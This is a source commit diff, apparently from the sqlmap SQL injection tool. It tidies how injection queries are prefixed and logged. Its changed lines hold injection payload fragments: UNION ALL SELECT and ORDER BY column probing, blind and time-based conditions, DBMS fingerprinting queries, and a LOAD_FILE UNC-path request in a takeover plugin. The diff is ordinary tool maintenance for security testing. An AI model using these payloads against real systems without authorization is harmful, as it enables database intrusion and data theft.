Minor code adjustments

bdamele · bdamele · commit 215175e3b70c · 2010-10-25T14:11:47.000Z
diff --git a/lib/core/agent.py b/lib/core/agent.py
@@ -446,7 +446,7 @@ def forgeInbandQuery(self, query, exprPosition=None, nullChar="NULL"):
         @rtype: C{str}
         """
 
-        inbandQuery = self.prefixQuery(" UNION ALL SELECT ")
+        inbandQuery = self.prefixQuery("UNION ALL SELECT ")
 
         if query.startswith("TOP"):
             topNum       = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1)
diff --git a/lib/request/inject.py b/lib/request/inject.py
@@ -96,7 +96,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
     advantage of an blind SQL injection vulnerability on the affected
     parameter through a bisection algorithm.
     """
-    query          = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].inference.query)
+
+    query          = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
     query          = agent.postfixQuery(query)
     payload        = agent.payload(newValue=query)
     count          = None
@@ -394,12 +395,13 @@ def goStacked(expression, silent=False):
     if conf.direct:
         return direct(expression), None
 
-    debugMsg = "query: %s" % expression
-    logger.debug(debugMsg)
-
     comment = queries[kb.dbms].comment.query
     query   = agent.prefixQuery("; %s" % expression)
     query   = agent.postfixQuery("%s;%s" % (query, comment))
+
+    debugMsg = "query: %s" % query
+    logger.debug(debugMsg)
+
     payload = agent.payload(newValue=query)
     page, _ = Request.queryPage(payload, content=True, silent=silent)
 
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
@@ -441,7 +441,7 @@ def downloadThread():
                 if commonValue is not None:
                     # One-shot query containing equals commonValue
                     testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
-                    query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
+                    query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
                     query = agent.postfixQuery(query)
                     queriesCount[0] += 1
                     result = Request.queryPage(urlencode(agent.payload(newValue=query)))
@@ -465,7 +465,7 @@ def downloadThread():
                     # Substring-query containing equals commonPattern
                     subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
                     testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
-                    query = agent.prefixQuery(" %s" % safeStringFormat("AND (%s) = %s", (subquery, testValue)))
+                    query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
                     query = agent.postfixQuery(query)
                     queriesCount[0] += 1
                     result = Request.queryPage(urlencode(agent.payload(newValue=query)))
diff --git a/lib/techniques/blind/timebased.py b/lib/techniques/blind/timebased.py
@@ -24,7 +24,7 @@ def timeTest():
     logger.info(infoMsg)
 
     timeQuery = getDelayQuery(andCond=True)
-    query     = agent.prefixQuery(" AND %s" % timeQuery)
+    query     = agent.prefixQuery("AND %s" % timeQuery)
     query     = agent.postfixQuery(query)
     payload   = agent.payload(newValue=query)
     start     = time.time()
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
@@ -35,12 +35,12 @@ def errorUse(expression):
     Retrieve the output of a SQL query taking advantage of an error SQL
     injection vulnerability on the affected parameter.
     """
+
     output         = None
     logic          = conf.logic
     randInt        = randomInt(1)
-    query          = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error.query)
+    query          = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
     query          = agent.postfixQuery(query)
-    payload        = agent.payload(newValue=query)
     startLimiter   = ""
     endLimiter     = ""
 
@@ -62,11 +62,13 @@ def errorUse(expression):
         startLimiter                     = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR)
         endLimiter                       = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR)
 
-    debugMsg = "query: %s" % expressionUnescaped
+    forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
+
+    debugMsg = "query: %s" % forgedQuery
     logger.debug(debugMsg)
 
-    forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
-    result = Request.queryPage(urlencode(forgedPayload), content=True)
+    payload = agent.payload(newValue=forgedQuery)
+    result = Request.queryPage(urlencode(payload), content=True)
 
     match = re.search('%s(?P<result>.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
     if match:
diff --git a/lib/techniques/inband/union/test.py b/lib/techniques/inband/union/test.py
@@ -136,7 +136,7 @@ def __unionTestByNULLBruteforce(comment):
     """
 
     columns = None
-    query   = agent.prefixQuery(" UNION ALL SELECT NULL")
+    query   = agent.prefixQuery("UNION ALL SELECT NULL")
 
     for count in range(0, 50):
         if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
@@ -164,7 +164,7 @@ def __unionTestByOrderBy(comment):
     prevPayload = ""
 
     for count in range(1, 51):
-        query        = agent.prefixQuery(" ORDER BY %d" % count)
+        query        = agent.prefixQuery("ORDER BY %d" % count)
         orderByQuery = agent.postfixQuery(query, comment)
         payload      = agent.payload(newValue=orderByQuery)
         seqMatcher   = Request.queryPage(payload, getSeqMatcher=True)
diff --git a/lib/techniques/inband/union/use.py b/lib/techniques/inband/union/use.py
@@ -196,8 +196,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh
         query = agent.forgeInbandQuery(expression, nullChar=nullChar)
         payload = agent.payload(newValue=query)
 
-        # NOTE: for debug purposes only
-        #debugMsg = "query: %s" % payload
         debugMsg = "query: %s" % query
         logger.debug(debugMsg)
 
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
@@ -37,7 +37,7 @@ def __sandBoxCheck(self):
             elif kb.dbmsVersion[0] in ("2002-2003", "2007"):
                 table = "MSysAccessStorage"
             if table:
-                query   = agent.prefixQuery(" AND EXISTS(SELECT CURDIR() FROM %s)" % table)
+                query   = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
                 query   = agent.postfixQuery(query)
                 payload = agent.payload(newValue=query)
                 result  = Request.queryPage(payload)
@@ -67,7 +67,7 @@ def __sysTablesCheck(self):
                     negate = True
                     table = table[1:]
                 randInt = randomInt()
-                query   = agent.prefixQuery(" AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table))
+                query   = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d) FROM %s" % (table, randInt, randInt, table))
                 query   = agent.postfixQuery(query)
                 payload = agent.payload(newValue=query)
                 result  = Request.queryPage(payload)
diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py
@@ -33,7 +33,7 @@ def __versionCheck(self):
         infoMsg = "executing SAP MaxDB SYSINFO version check"
         logger.info(infoMsg)
 
-        query   = agent.prefixQuery(" /* NoValue */")
+        query   = agent.prefixQuery("/* NoValue */")
         query   = agent.postfixQuery(query)
         payload = agent.payload(newValue=query)
         result  = Request.queryPage(payload)
@@ -47,7 +47,7 @@ def __versionCheck(self):
         minor, major = None, None
 
         for version in [6, 7]:
-            query   = agent.prefixQuery(" AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
+            query   = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
             query   = agent.postfixQuery(query)
             payload = agent.payload(newValue=query)
             result  = Request.queryPage(payload)
@@ -56,7 +56,7 @@ def __versionCheck(self):
                 major = version
 
         for version in xrange(0, 10):
-            query   = agent.prefixQuery(" AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
+            query   = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
             query   = agent.postfixQuery(query)
             payload = agent.payload(newValue=query)
             result  = Request.queryPage(payload)
diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py
@@ -33,7 +33,7 @@ def __commentCheck(self):
         infoMsg = "executing MySQL comment injection fingerprint"
         logger.info(infoMsg)
 
-        query   = agent.prefixQuery(" /* NoValue */")
+        query   = agent.prefixQuery("/* NoValue */")
         query   = agent.postfixQuery(query)
         payload = agent.payload(newValue=query)
         result  = Request.queryPage(payload)
@@ -63,7 +63,7 @@ def __commentCheck(self):
             for version in range(element[0], element[1] + 1):
                 randInt = randomInt()
                 version = getUnicode(version)
-                query   = agent.prefixQuery(" /*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
+                query   = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
                 query   = agent.postfixQuery(query)
                 payload = agent.payload(newValue=query)
                 result  = Request.queryPage(payload)
diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
@@ -101,7 +101,7 @@ def udfCreateFromSharedLib(self, udf, inpRet):
 
     def uncPathRequest(self):
         if not kb.stackedTest:
-            query   = agent.prefixQuery(" AND LOAD_FILE('%s')" % self.uncPath)
+            query   = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
             query   = agent.postfixQuery(query)
             payload = agent.payload(newValue=query)
 
diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py
@@ -815,7 +815,7 @@ def tableExists(self, tableFile):
         length = len(tables)
 
         for table in tables:
-            query = agent.prefixQuery(" %s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table))
+            query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT 1 FROM %s)", table))
             query = agent.postfixQuery(query)
             result = Request.queryPage(urlencode(agent.payload(newValue=query)))
 
